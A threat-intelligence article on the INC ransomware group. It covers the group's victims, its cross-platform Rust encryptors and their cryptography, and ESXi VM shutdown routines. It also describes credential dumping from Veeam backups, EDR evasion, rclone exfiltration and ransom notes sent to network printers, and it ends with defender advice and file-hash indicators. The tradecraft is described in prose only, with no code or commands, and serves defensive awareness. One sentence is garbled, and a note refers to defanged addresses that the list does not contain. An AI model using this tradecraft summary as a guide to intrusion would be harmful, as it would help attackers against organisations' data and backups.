INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base.
The group’s recent campaigns demonstrate both incremental tooling refinement and novel pressure tactics: double extortion of stolen data combined with automated network printing of ransom notes to ensure physical visibility of demands.
Technically, INC has modernized its toolset. Both the Windows and Linux/ESXi encryptors were rewritten in Rust, enabling cross-platform builds and complicating analysis through unfamiliar compiler artifacts and containerized build traces.
The Windows payloads are delivered as heavily obfuscated PE64 binaries that leverage VMProtect in some samples, while other builds expose clear import tables and native API usage.
Static and dynamic analysis shows the malware is operator-driven: it parses command-line arguments for granular control, spawns a threadpool sized proportional to CPU cores (cores × 4), and supports multiple encryption modes (fast, medium, slow) and partial encryption heuristics to accelerate impact while preserving host responsiveness to display ransom instructions.
INC’s asymmetric/symmetric hybrid cryptography uses Curve25519-derived keys and AES/Salsa constructions to protect per-file keys, with a consistent .INC extension and a distinctive footer signature appended to encrypted files.
On Linux/ESXi targets the binary implements X25519 ECDH to derive AES-CTR keys per file and includes ESXi-specific routines that enumerate VMs via vim-cmd, shut them down, and optionally skip specified VM IDs actions designed to maximize payload reach across virtualized infrastructure.
Victims span globally but it predominantly targets organizations from the United States and has many notable victims from the past including NHS Scotland, Xerox and Texas State Bar, among others.
According to Acronis Threat Research Unit (TRU) examines the evolution of INC ransomware, its attack chain, victimology, tooling and recent tactics, techniques and procedures (TTPs).
INC Ransomware Uses Double Extortion
The group’s intrusion lifecycle follows mature, human-operated ransomware playbooks. Initial access vectors include spear-phishing, purchased valid credentials from IABs, and exploitation of public-facing vulnerabilities such as Citrix and Fortinet CVEs and recent SimpleHelp RMM flaws.
For discovery and lateral movement actors use native tooling, Angry IP Scanner, PsExec, RDP and commercial RMM solutions.
Recent incident telemetry shows an updated credential dumper tailored to Veeam backups: a modified Veeam-Get-Creds.ps1 variant that adds hardcoded SQL connection parameters and support for Veeam’s newer salted DPAPI credential encryption.
That enhancement indicates proactive adaptation to contemporary backup deployments and increases the odds of entirely disabling recovery capability before encryption.
Defense-evasion includes process termination (PsKill and custom process terminators that deploy vulnerable drivers), shadow copy deletion through DeviceIoControl calls, and targeted attempts to disable EDRs.
For command-and-control and hands-on-keyboard access operators use a mix of Cobalt Strike, AnyDesk, ScreenConnect and TeamViewer.
Exfiltration is staged with 7-Zip archives and rclone to cloud storage an approach that eases data transfer to varied providers while helping bypass perimeter filters.
The ransomware sample is a 64-bit Linux Executable and Linkable Format (ELF64) binary compiled as a position-independent shared object (DYN) under GCC (3.X).
Beyond technical evolution, INC’s operational posture emphasizes psychological and contractual pressure. Operators run a dual-site infrastructure: a private negotiation portal for victims and a public leak site to publish stolen data.
In addition to changing desktop wallpapers and dropping .txt/.html ransom notes, the malware actively enumerates networked printers and issues print jobs containing ransom instructions producing hard-copy extortion notices visible to employees and partners, a tangible lever to accelerate payment decisions.
Victimology centers on the United States (over 65% of listings) and skews toward legal services, manufacturing, technology, health care and construction sectors where data sensitivity and operational disruption increase payability.
INC’s codebase also proliferated after a 2024 source-code sale, spawning related families like Lynx and Sinobi and spreading techniques across the ransomware ecosystem.
Defenders should prioritize reducing external attack surface, patching exposed services, protecting backup credentials and monitoring for credential-dumping scripts, abnormal rclone activity, and unauthorized print jobs.
Rapid detection of Veeam credential access and hardening of backup server accounts remain critical to limiting the combined impact of encryption and double extortion.
Indicators of compromise (IOCs)
Windows
31800380c359143ae82c4f9011eee653dd22443d03d6a499148203bbfc275502
ea721240c14e3d14f8d88e0020880448c6c602f1180a1e5dbe40871cfeedcc22
8d1a22c430252f29611766b8e4a82af0fba60d609246463466b384d6d4793df4
bf8c45e5aa9551a17eefbd1d179422c32b4309c47ee9a3f315bb80ed6d4f7efc
6bf155b269d452f3c3b62832b27bbebe4da436e228dbf521155b1d5989e3743f
1898d056463284d849801cbdea6a3dec6c9f568f01569912c3868a5eea9a5449
24f6c0ca39b2a5593086ff56d818ddfbde121f8e44d54faa762e510397dc9db7
dc9938f51150d13a69fc25f3f19052eacb1bf0a086fd5cf39762501fb3ddd7da
acce811c4fc2a6e3fddd4231e386f1648ca44f039d2d275316bc0a0fc96e0af4
90e46e89fec2108a1cb4850bb33e3563e92a14d04e1e613ac8c9311f152d294c
ff5da8f0330a4c581c37284c74aae2683c007dc6e406e1e2e6803e7bb398b77b
97aebda5482899fef84a24e456bff055acaa47e5ab4029f768d9e0c62a660ce2
1d10d8f5a420d0e4683b4cb40bcf0c984d1e7ea1f3b4442a00a525584632ac11
f6a01d0246ce31faf6938ea488086d4358505405a4ef5c5faa482e79e92cb347
d65120291dee76c694f8bea54841f7f68329b499b28f4aee5ea5c9369a7432cb
765508aa2ec6a1b73a76a23f4fa559d32355622748c91a46ed7b315eae2ee60a
d26bfb0147f60dc6500a9298d521ee67b49daaf4b8f8be54e7cc8fd86a597570
Linux
589d9480fbfec2d8e61638eb0b537183d0f9977411fd1d2c0f8eb611feebe880
7f37351979c249417cb180b4ede0ed17e5fe2a1f08add4d72606b589f8fdb245
5cc212f84d2bf3fbab165aaf09b16e00fcf2f1ccd880d24b14404c53dcdbf241
60aeb9f7bccf377ff02ed64783e66a62c0f976878d9729b067bc7e5b0b9da9d6
6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
Click Here For The Original Source.
